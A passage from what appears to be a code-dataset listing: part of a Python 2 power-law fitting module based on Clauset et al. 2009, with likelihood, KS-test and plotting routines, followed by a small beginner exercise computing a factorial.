if usecy: print "cython cplfit did not load"
self._av = av
self._xmin_kstest = dat
self._sigma = sigma
# [:-1] to weed out the very last data point; it cannot be correct
# (can't have a power law with 1 data point).
# However, this should only be done if the ends have not previously
# been excluded with nosmall
if nosmall:
xmin = xmins[argmin(dat)]
else:
xmin = xmins[argmin(dat[:-1])]
z = z[z>=xmin]
n = len(z)
alpha = 1 + n / sum(log(z/xmin))
if finite:
alpha = alpha*(n-1.)/n+1./n
if n < 50 and not finite and not silent:
print '(PLFIT) Warning: finite-size bias may be present. n=%i' % n
ks = max(abs( numpy.arange(n)/float(n) - (1-(xmin/z)**(alpha-1)) ))
# Parallels Eqn 3.5 in Clauset et al 2009, but zeta(alpha, xmin) = (alpha-1)/xmin. Really is Eqn B3 in paper.
L = n*log((alpha-1)/xmin) - alpha*sum(log(z/xmin))
#requires another map... Larr = arange(len(unique(x))) * log((av-1)/unique(x)) - av*sum
self._likelihood = L
self._xmin = xmin
self._xmins = xmins
self._alpha= alpha
self._alphaerr = (alpha-1)/numpy.sqrt(n)
self._ks = ks # this ks statistic may not have the same value as min(dat) because of unique()
if scipyOK: self._ks_prob = scipy.stats.kstwobign.sf(ks*numpy.sqrt(n))
self._ngtx = n
if n == 1:
if not silent:
print "Failure: only 1 point kept. Probably not a power-law distribution."
self._alpha = alpha = 0
self._alphaerr = 0
self._likelihood = L = 0
self._ks = 0
self._ks_prob = 0
self._xmin = xmin
return xmin,0
if numpy.isnan(L) or numpy.isnan(xmin) or numpy.isnan(alpha):
raise ValueError("plfit failed; returned a nan")
if not quiet:
if verbose: print "The lowest value included in the power-law fit, ",
print "xmin: %g" % xmin,
if verbose: print "\nThe number of values above xmin, ",
print "n(>xmin): %i" % n,
if verbose: print "\nThe derived power-law alpha (p(x)~x^-alpha) with MLE-derived error, ",
print "alpha: %g +/- %g " % (alpha,self._alphaerr),
if verbose: print "\nThe log of the Likelihood (the maximized parameter; you minimized the negative log likelihood), ",
print "Log-Likelihood: %g " % L,
if verbose: print "\nThe KS-test statistic between the best-fit power-law and the data, ",
print "ks: %g" % (ks),
if scipyOK:
if verbose: print " occurs with probability ",
print "p(ks): %g" % (self._ks_prob)
else:
print
return xmin,alpha
def discrete_best_alpha(self, alpharangemults=(0.9,1.1), n_alpha=201, approximate=True, verbose=True, finite=True):
"""
Use the maximum L to determine the most likely value of alpha
*alpharangemults* [ 2-tuple ]
Pair of values indicating multiplicative factors above and below the
approximate alpha from the MLE alpha to use when determining the
"exact" alpha (by directly maximizing the likelihood function)
*n_alpha* [ int ]
Number of alpha values to use when measuring. Larger number is more accurate.
*approximate* [ bool ]
If False, try to "zoom-in" around the MLE alpha and get the exact
best alpha value within some range around the approximate best
*vebose* [ bool ]
*finite* [ bool ]
Correction for finite data?
"""
data = self.data
self._xmins = xmins = numpy.unique(data)
if approximate:
alpha_of_xmin = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
else:
alpha_approx = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
alpharanges = [(0.9*a,1.1*a) for a in alpha_approx]
alpha_of_xmin = [ most_likely_alpha(data,xmin,alpharange=ar,n_alpha=n_alpha) for xmin,ar in zip(xmins,alpharanges) ]
ksvalues = numpy.array([ discrete_ksD(data, xmin, alpha) for xmin,alpha in zip(xmins,alpha_of_xmin) ])
self._av = numpy.array(alpha_of_xmin)
self._xmin_kstest = ksvalues
ksvalues[numpy.isnan(ksvalues)] = numpy.inf
best_index = argmin(ksvalues)
self._alpha = best_alpha = alpha_of_xmin[best_index]
self._xmin = best_xmin = xmins[best_index]
self._ks = best_ks = ksvalues[best_index]
self._likelihood = best_likelihood = discrete_likelihood(data, best_xmin, best_alpha)
if finite:
self._alpha = self._alpha*(n-1.)/n+1./n
if verbose:
print "alpha = %f xmin = %f ksD = %f L = %f (n<x) = %i (n>=x) = %i" % (
best_alpha, best_xmin, best_ks, best_likelihood,
(data<best_xmin).sum(), (data>=best_xmin).sum())
self._ngtx = n = (self.data>=self._xmin).sum()
self._alphaerr = (self._alpha-1.0)/numpy.sqrt(n)
if scipyOK: self._ks_prob = scipy.stats.kstwobign.sf(self._ks*numpy.sqrt(n))
return best_alpha,best_xmin,best_ks,best_likelihood
def xminvsks(self, **kwargs):
"""
Plot xmin versus the ks value for derived alpha. This plot can be used
as a diagnostic of whether you have derived the 'best' fit: if there are
multiple local minima, your data set may be well suited to a broken
powerlaw or a different function.
"""
pylab.plot(self._xmins,self._xmin_kstest,'.')
pylab.plot(self._xmin,self._ks,'s')
#pylab.errorbar([self._ks],self._alpha,yerr=self._alphaerr,fmt='+')
ax=pylab.gca()
ax.set_ylabel("KS statistic")
ax.set_xlabel("min(x)")
pylab.draw()
return ax
def alphavsks(self,autozoom=True,**kwargs):
"""
Plot alpha versus the ks value for derived alpha. This plot can be used
as a diagnostic of whether you have derived the 'best' fit: if there are
multiple local minima, your data set may be well suited to a broken
powerlaw or a different function.
"""
pylab.plot(1+self._av,self._xmin_kstest,'.')
pylab.errorbar(self._alpha,[self._ks],xerr=self._alphaerr,fmt='+')
ax=pylab.gca()
if autozoom:
ax.set_ylim(0.8*(self._ks),3*(self._ks))
ax.set_xlim((self._alpha)-5*self._alphaerr,(self._alpha)+5*self._alphaerr)
ax.set_ylabel("KS statistic")
ax.set_xlabel(r'$\alpha$')
pylab.draw()
return ax
def plotcdf(self, x=None, xmin=None, alpha=None, pointcolor='k',
pointmarker='+', **kwargs):
"""
Plots CDF and powerlaw
"""
if x is None: x=self.data
if xmin is None: xmin=self._xmin
if alpha is None: alpha=self._alpha
x=numpy.sort(x)
n=len(x)
xcdf = numpy.arange(n,0,-1,dtype='float')/float(n)
q = x[x>=xmin]
fcdf = (q/xmin)**(1-alpha)
nc = xcdf[argmax(x>=xmin)]
fcdf_norm = nc*fcdf
D_location = argmax(xcdf[x>=xmin]-fcdf_norm)
pylab.vlines(q[D_location],xcdf[x>=xmin][D_location],fcdf_norm[D_location],color='m',linewidth=2)
#plotx = pylab.linspace(q.min(),q.max(),1000)
#ploty = (plotx/xmin)**(1-alpha) * nc
pylab.loglog(x,xcdf,marker=pointmarker,color=pointcolor,**kwargs)
#pylab.loglog(plotx,ploty,'r',**kwargs)
pylab.loglog(q,fcdf_norm,'r',**kwargs)
def plotpdf(self,x=None,xmin=None,alpha=None,nbins=50,dolog=True,dnds=False,
drawstyle='steps-post', histcolor='k', plcolor='r', **kwargs):
"""
Plots PDF and powerlaw.
kwargs is passed to pylab.hist and pylab.plot
"""
if not(x): x=self.data
if not(xmin): xmin=self._xmin
if not(alpha): alpha=self._alpha
x=numpy.sort(x)
n=len(x)
pylab.gca().set_xscale('log')
pylab.gca().set_yscale('log')
if dnds:
hb = pylab.histogram(x,bins=numpy.logspace(log10(min(x)),log10(max(x)),nbins))
h = hb[0]
b = hb[1]
db = hb[1][1:]-hb[1][:-1]
h = h/db
pylab.plot(b[:-1],h,drawstyle=drawstyle,color=histcolor,**kwargs)
#alpha -= 1
elif dolog:
hb = pylab.hist(x,bins=numpy.logspace(log10(min(x)),log10(max(x)),nbins),log=True,fill=False,edgecolor=histcolor,**kwargs)
alpha -= 1
h,b=hb[0],hb[1]
else:
hb = pylab.hist(x,bins=numpy.linspace((min(x)),(max(x)),nbins),fill=False,edgecolor=histcolor,**kwargs)
h,b=hb[0],hb[1]
# plotting points are at the center of each bin
b = (b[1:]+b[:-1])/2.0
q = x[x>=xmin]
px = (alpha-1)/xmin * (q/xmin)**(-alpha)
# Normalize by the median ratio between the histogram and the power-law
# The normalization is semi-arbitrary; an average is probably just as valid
plotloc = (b>xmin)*(h>0)
norm = numpy.median( h[plotloc] / ((alpha-1)/xmin * (b[plotloc]/xmin)**(-alpha)) )
px = px*norm
plotx = pylab.linspace(q.min(),q.max(),1000)
ploty = (alpha-1)/xmin * (plotx/xmin)**(-alpha) * norm
#pylab.loglog(q,px,'r',**kwargs)
pylab.loglog(plotx,ploty,color=plcolor,**kwargs)
axlims = pylab.axis()
pylab.vlines(xmin,axlims[2],max(px),colors=plcolor,linestyle='dashed')
pylab.gca().set_xlim(min(x),max(x))
def plotppf(self,x=None,xmin=None,alpha=None,dolog=True,**kwargs):
"""
Plots the power-law-predicted value on the Y-axis against the real
values along the X-axis. Can be used as a diagnostic of the fit
quality.
"""
if not(xmin): xmin=self._xmin
if not(alpha): alpha=self._alpha
if not(x): x=numpy.sort(self.data[self.data>xmin])
else: x=numpy.sort(x[x>xmin])
# N = M^(-alpha+1)
# M = N^(1/(-alpha+1))
m0 = min(x)
N = (1.0+numpy.arange(len(x)))[::-1]
xmodel = m0 * N**(1/(1-alpha)) / max(N)**(1/(1-alpha))
if dolog:
pylab.loglog(x,xmodel,'.',**kwargs)
pylab.gca().set_xlim(min(x),max(x))
pylab.gca().set_ylim(min(x),max(x))
else:
pylab.plot(x,xmodel,'.',**kwargs)
pylab.plot([min(x),max(x)],[min(x),max(x)],'k--')
pylab.xlabel("Real Value")
pylab.ylabel("Power-Law Model Value")
def test_pl(self,niter=1e3, print_timing=False, **kwargs):
"""
Monte-Carlo test to determine whether distribution is consistent with a power law
Runs through niter iterations of a sample size identical to the input sample size.
Will randomly select values from the data < xmin. The number of values selected will
be chosen from a uniform random distribution with p(<xmin) = n(<xmin)/n.
Once the sample is created, it is fit using above methods, then the best fit is used to
compute a Kolmogorov-Smirnov statistic. The KS stat distribution is compared to the
KS value for the fit to the actual data, and p = fraction of random ks values greater
than the data ks value is computed. If p<.1, the data may be inconsistent with a
powerlaw. A data set of n(>xmin)>100 is required to distinguish a PL from an exponential,
and n(>xmin)>~300 is required to distinguish a log-normal distribution from a PL.
For more details, see figure 4.1 and section
**WARNING** This can take a very long time to run! Execution time scales as
niter * setsize
"""
xmin = self._xmin
alpha = self._alpha
niter = int(niter)
ntail = sum(self.data >= xmin)
ntot = len(self.data)
nnot = ntot-ntail # n(<xmin)
pnot = nnot/float(ntot) # p(<xmin)
nonpldata = self.data[self.data<xmin]
nrandnot = sum( npr.rand(ntot) < pnot ) # randomly choose how many to sample from <xmin
nrandtail = ntot - nrandnot # and the rest will be sampled from the powerlaw
ksv = []
if print_timing: deltat = []
for i in xrange(niter):
# first, randomly sample from power law
# with caveat!
nonplind = numpy.floor(npr.rand(nrandnot)*nnot).astype('int')
fakenonpl = nonpldata[nonplind]
randarr = npr.rand(nrandtail)
fakepl = randarr**(1/(1-alpha)) * xmin
fakedata = numpy.concatenate([fakenonpl,fakepl])
if print_timing: t0 = time.time()
# second, fit to powerlaw
# (add some silencing kwargs optionally)
for k,v in {'quiet':True,'silent':True,'nosmall':True}.iteritems():
if k not in kwargs:
kwargs[k] = v
TEST = plfit(fakedata,**kwargs)
ksv.append(TEST._ks)
if print_timing:
deltat.append( time.time() - t0 )
print "Iteration %i: %g seconds" % (i, deltat[-1])
ksv = numpy.array(ksv)
p = (ksv>self._ks).sum() / float(niter)
self._pval = p
self._ks_rand = ksv
print "p(%i) = %0.3f" % (niter,p)
if print_timing: print "Iteration timing: %g +/- %g" % (numpy.mean(deltat),numpy.std(deltat))
return p,ksv
def lognormal(self,doprint=True):
"""
Use the maximum likelihood estimator for a lognormal distribution to
produce the best-fit lognormal parameters
"""
# N = float(self.data.shape[0])
# mu = log(self.data).sum() / N
# sigmasquared = ( ( log(self.data) - mu )**2 ).sum() / N
# self.lognormal_mu = mu
# self.lognormal_sigma = numpy.sqrt(sigmasquared)
# self.lognormal_likelihood = -N/2. * log(numpy.pi*2) - N/2. * log(sigmasquared) - 1/(2*sigmasquared) * (( self.data - mu )**2).sum()
# if doprint:
# print "Best fit lognormal is exp( -(x-%g)^2 / (2*%g^2)" % (mu,numpy.sqrt(sigmasquared))
# print "Likelihood: %g" % (self.lognormal_likelihood)
if scipyOK:
fitpars = scipy.stats.lognorm.fit(self.data)
self.lognormal_dist = scipy.stats.lognorm(*fitpars)
self.lognormal_ksD,self.lognormal_ksP = scipy.stats.kstest(self.data,self.lognormal_dist.cdf)
# nnlf = NEGATIVE log likelihood
self.lognormal_likelihood = -1*scipy.stats.lognorm.nnlf(fitpars,self.data)
# Is this the right likelihood ratio?
# Definition of L from eqn. B3 of Clauset et al 2009:
# L = log(p(x|alpha))
# _nnlf from scipy.stats.distributions:
# -sum(log(self._pdf(x, *args)),axis=0)
# Assuming the pdf and p(x|alpha) are both non-inverted, it looks
# like the _nnlf and L have opposite signs, which would explain the
# likelihood ratio I've used here:
self.power_lognorm_likelihood = (self._likelihood + self.lognormal_likelihood)
# a previous version had 2*(above). That is the correct form if you want the likelihood ratio
# statistic "D": http://en.wikipedia.org/wiki/Likelihood-ratio_test
# The above explanation makes sense, since nnlf is the *negative* log likelihood function:
## nnlf -- negative log likelihood function (to minimize)
#
# Assuming we want the ratio between the POSITIVE likelihoods, the D statistic is:
# D = -2 log( L_power / L_lognormal )
self.likelihood_ratio_D = -2 * (log(self._likelihood/self.lognormal_likelihood))
if doprint:
print "Lognormal KS D: %g p(D): %g" % (self.lognormal_ksD,self.lognormal_ksP),
print " Likelihood Ratio Statistic (powerlaw/lognormal): %g" % self.likelihood_ratio_D
print "At this point, have a look at Clauset et al 2009 Appendix C: determining sigma(likelihood_ratio)"
def plot_lognormal_pdf(self,**kwargs):
"""
Plot the fitted lognormal distribution
"""
if not hasattr(self,'lognormal_dist'):
return
normalized_pdf = self.lognormal_dist.pdf(self.data)/self.lognormal_dist.pdf(self.data).max()
minY,maxY = pylab.gca().get_ylim()
pylab.plot(self.data,normalized_pdf*maxY,'.',**kwargs)
def plot_lognormal_cdf(self,**kwargs):
"""
Plot the fitted lognormal distribution
"""
if not hasattr(self,'lognormal_dist'):
return
x=numpy.sort(self.data)
n=len(x)
xcdf = numpy.arange(n,0,-1,dtype='float')/float(n)
lcdf = self.lognormal_dist.sf(x)
D_location = argmax(xcdf-lcdf)
pylab.vlines(x[D_location],xcdf[D_location],lcdf[D_location],color='m',linewidth=2)
pylab.plot(x, lcdf,',',**kwargs)
def plfit_lsq(x,y):
"""
Returns A and B in y=Ax^B
http://mathworld.wolfram.com/LeastSquaresFittingPowerLaw.html
"""
n = len(x)
btop = n * (log(x)*log(y)).sum() - (log(x)).sum()*(log(y)).sum()
bbottom = n*(log(x)**2).sum() - (log(x).sum())**2
b = btop / bbottom
a = ( log(y).sum() - b * log(x).sum() ) / n
A = exp(a)
return A,b
def plexp(x,xm=1,a=2.5):
"""
CDF(x) for the piecewise distribution exponential x<xmin, powerlaw x>=xmin
This is the CDF version of the distributions drawn in fig 3.4a of Clauset et al.
"""
C = 1/(-xm/(1 - a) - xm/a + exp(a)*xm/a)
Ppl = lambda(X): 1+C*(xm/(1-a)*(X/xm)**(1-a))
Pexp = lambda(X): C*xm/a*exp(a)-C*(xm/a)*exp(-a*(X/xm-1))
d=Ppl(x)
d[x<xm]=Pexp(x)
return d
def plexp_inv(P,xm,a):
"""
Inverse CDF for a piecewise PDF as defined in eqn. 3.10
of Clauset et al.
"""
C = 1/(-xm/(1 - a) - xm/a + exp(a)*xm/a)
Pxm = 1+C*(xm/(1-a))
x = P*0
x[P>=Pxm] = xm*( (P[P>=Pxm]-1) * (1-a)/(C*xm) )**(1/(1-a)) # powerlaw
x[P<Pxm] = (log( (C*xm/a*exp(a)-P[P<Pxm])/(C*xm/a) ) - a) * (-xm/a) # exp
return x
def pl_inv(P,xm,a):
"""
Inverse CDF for a pure power-law
"""
x = (1-P)**(1/(1-a)) * xm
return x
def test_fitter(xmin=1.0,alpha=2.5,niter=500,npts=1000,invcdf=plexp_inv):
"""
Tests the power-law fitter
Examples
========
Example (fig 3.4b in Clauset et al.)::
xminin=[0.25,0.5,0.75,1,1.5,2,5,10,50,100]
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=xminin,niter=1,npts=50000)
loglog(xminin,xmarr.squeeze(),'x')
Example 2::
xminin=[0.25,0.5,0.75,1,1.5,2,5,10,50,100]
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=xminin,niter=10,npts=1000)
loglog(xminin,xmarr.mean(axis=0),'x')
Example 3::
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=1.0,niter=1000,npts=1000)
hist(xmarr.squeeze());
# Test results:
# mean(xmarr) = 0.70, median(xmarr)=0.65 std(xmarr)=0.20
# mean(af) = 2.51 median(af) = 2.49 std(af)=0.14
# biased distribution; far from correct value of xmin but close to correct alpha
Example 4::
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=1.0,niter=1000,npts=1000,invcdf=pl_inv)
print("mean(xmarr): %0.2f median(xmarr): %0.2f std(xmarr): %0.2f" % (mean(xmarr),median(xmarr),std(xmarr)))
print("mean(af): %0.2f median(af): %0.2f std(af): %0.2f" % (mean(af),median(af),std(af)))
# mean(xmarr): 1.19 median(xmarr): 1.03 std(xmarr): 0.35
# mean(af): 2.51 median(af): 2.50 std(af): 0.07
"""
xmin = numpy.array(xmin)
if xmin.shape == ():
xmin.shape = 1
lx = len(xmin)
sz = [niter,lx]
xmarr,alphaf_v,ksv,nxarr = numpy.zeros(sz),numpy.zeros(sz),numpy.zeros(sz),numpy.zeros(sz)
for j in xrange(lx):
for i in xrange(niter):
randarr = npr.rand(npts)
fakedata = invcdf(randarr,xmin[j],alpha)
TEST = plfit(fakedata,quiet=True,silent=True,nosmall=True)
alphaf_v[i,j] = TEST._alpha
ksv[i,j] = TEST._ks
nxarr[i,j] = TEST._ngtx
xmarr[i,j] = TEST._xmin
return xmarr,alphaf_v,ksv,nxarr
def discrete_likelihood(data, xmin, alpha):
"""
Equation B.8 in Clauset
Given a data set, an xmin value, and an alpha "scaling parameter", computes
the log-likelihood (the value to be maximized)
"""
if not scipyOK:
raise ImportError("Can't import scipy. Need scipy for zeta function.")
from scipy.special import zeta as zeta
zz = data[data>=xmin]
nn = len(zz)
sum_log_data = numpy.log(zz).sum()
zeta = zeta(alpha, xmin)
L_of_alpha = -1*nn*log(zeta) - alpha * sum_log_data
return L_of_alpha
def discrete_likelihood_vector(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Compute the likelihood for all "scaling parameters" in the range (alpharange)
for a given xmin. This is only part of the discrete value likelihood
maximization problem as described in Clauset et al
(Equation B.8)
*alpharange* [ 2-tuple ]
Two floats specifying the upper and lower limits of the power law alpha to test
"""
from scipy.special import zeta as zeta
zz = data[data>=xmin]
nn = len(zz)
alpha_vector = numpy.linspace(alpharange[0],alpharange[1],n_alpha)
sum_log_data = numpy.log(zz).sum()
# alpha_vector is a vector, xmin is a scalar
zeta_vector = zeta(alpha_vector, xmin)
#xminvec = numpy.arange(1.0,xmin)
#xminalphasum = numpy.sum([xm**(-alpha_vector) for xm in xminvec])
#L = -1*alpha_vector*sum_log_data - nn*log(zeta_vector) - xminalphasum
L_of_alpha = -1*nn*log(zeta_vector) - alpha_vector * sum_log_data
return L_of_alpha
def discrete_max_likelihood_arg(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Returns the *argument* of the max of the likelihood of the data given an input xmin
"""
likelihoods = discrete_likelihood_vector(data, xmin, alpharange=alpharange, n_alpha=n_alpha)
Largmax = numpy.argmax(likelihoods)
return Largmax
def discrete_max_likelihood(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Returns the *argument* of the max of the likelihood of the data given an input xmin
"""
likelihoods = discrete_likelihood_vector(data, xmin, alpharange=alpharange, n_alpha=n_alpha)
Lmax = numpy.max(likelihoods)
return Lmax
def most_likely_alpha(data, xmin, alpharange=(1.5,3.5), n_alpha=201):
"""
Return the most likely alpha for the data given an xmin
"""
alpha_vector = numpy.linspace(alpharange[0],alpharange[1],n_alpha)
return alpha_vector[discrete_max_likelihood_arg(data, xmin, alpharange=alpharange, n_alpha=n_alpha)]
def discrete_alpha_mle(data, xmin):
"""
Equation B.17 of Clauset et al 2009
The Maximum Likelihood Estimator of the "scaling parameter" alpha in the
discrete case is similar to that in the continuous case
"""
# boolean indices of positive data
gexmin = (data>=xmin)
nn = gexmin.sum()
if nn < 2:
return 0
xx = data[gexmin]
alpha = 1.0 + float(nn) * ( sum(log(xx/(xmin-0.5))) )**-1
return alpha
def discrete_best_alpha(data, alpharangemults=(0.9,1.1), n_alpha=201, approximate=True, verbose=True):
"""
Use the maximum L to determine the most likely value of alpha
*alpharangemults* [ 2-tuple ]
Pair of values indicating multiplicative factors above and below the
approximate alpha from the MLE alpha to use when determining the
"exact" alpha (by directly maximizing the likelihood function)
"""
xmins = numpy.unique(data)
if approximate:
alpha_of_xmin = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
else:
alpha_approx = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
alpharanges = [(0.9*a,1.1*a) for a in alpha_approx]
alpha_of_xmin = [ most_likely_alpha(data,xmin,alpharange=ar,n_alpha=n_alpha) for xmin,ar in zip(xmins,alpharanges) ]
ksvalues = [ discrete_ksD(data, xmin, alpha) for xmin,alpha in zip(xmins,alpha_of_xmin) ]
best_index = argmin(ksvalues)
best_alpha = alpha_of_xmin[best_index]
best_xmin = xmins[best_index]
best_ks = ksvalues[best_index]
best_likelihood = discrete_likelihood(data, best_xmin, best_alpha)
if verbose:
print "alpha = %f xmin = %f ksD = %f L = %f (n<x) = %i (n>=x) = %i" % (
best_alpha, best_xmin, best_ks, best_likelihood,
(data<best_xmin).sum(), (data>=best_xmin).sum())
return best_alpha,best_xmin,best_ks,best_likelihood
def discrete_ksD(data, xmin, alpha):
"""
given a sorted data set, a minimum, and an alpha, returns the power law ks-test
D value w/data
The returned value is the "D" parameter in the ks test
(this is implemented differently from the continuous version because there
are potentially multiple identical points that need comparison to the power
law)
"""
zz = numpy.sort(data[data>=xmin])
nn = float(len(zz))
if nn < 2: return numpy.inf
#cx = numpy.arange(nn,dtype='float')/float(nn)
#cf = 1.0-(zz/xmin)**(1.0-alpha)
model_cdf = 1.0-(zz/xmin)**(1.0-alpha)
data_cdf = numpy.searchsorted(zz,zz,side='left')/(float(nn))
ks = max(abs(model_cdf-data_cdf))
return ks
| [
"[email protected]"
] | |
a80d9b938594db48e8dd0d649481f0021e23eaa1 | 7d8332bbe03ec8c896f6ead97fa3b29a06e9b14f | /Q002.py | 7a786079b8bca93cdc6399d9cc94b0a2b210eb0e | [] | no_license | geomotion-luka/python-exercises | ea96f050ce4dd811ded973d147d4423678588420 | 79d3abced3492e263a8a9ad0003ce0b2503a40dd | refs/heads/master | 2020-04-08T18:16:39.221184 | 2018-12-11T08:25:01 | 2018-12-11T08:25:01 | 159,600,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | #----------------------------------------#
# Question 2
# Level 1
#
# Question:
# Write a program which can compute the factorial of a given numbers.
# The results should be printed in a comma-separated sequence on a single line.
# Suppose the following input is supplied to the program:
# 8
# Then, the output should be:
# 40320
def factorial(number):
result = number
for i in range(number - 1,0,-1):
result *= i
print(result)
input = input()
factorial(int(input))
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.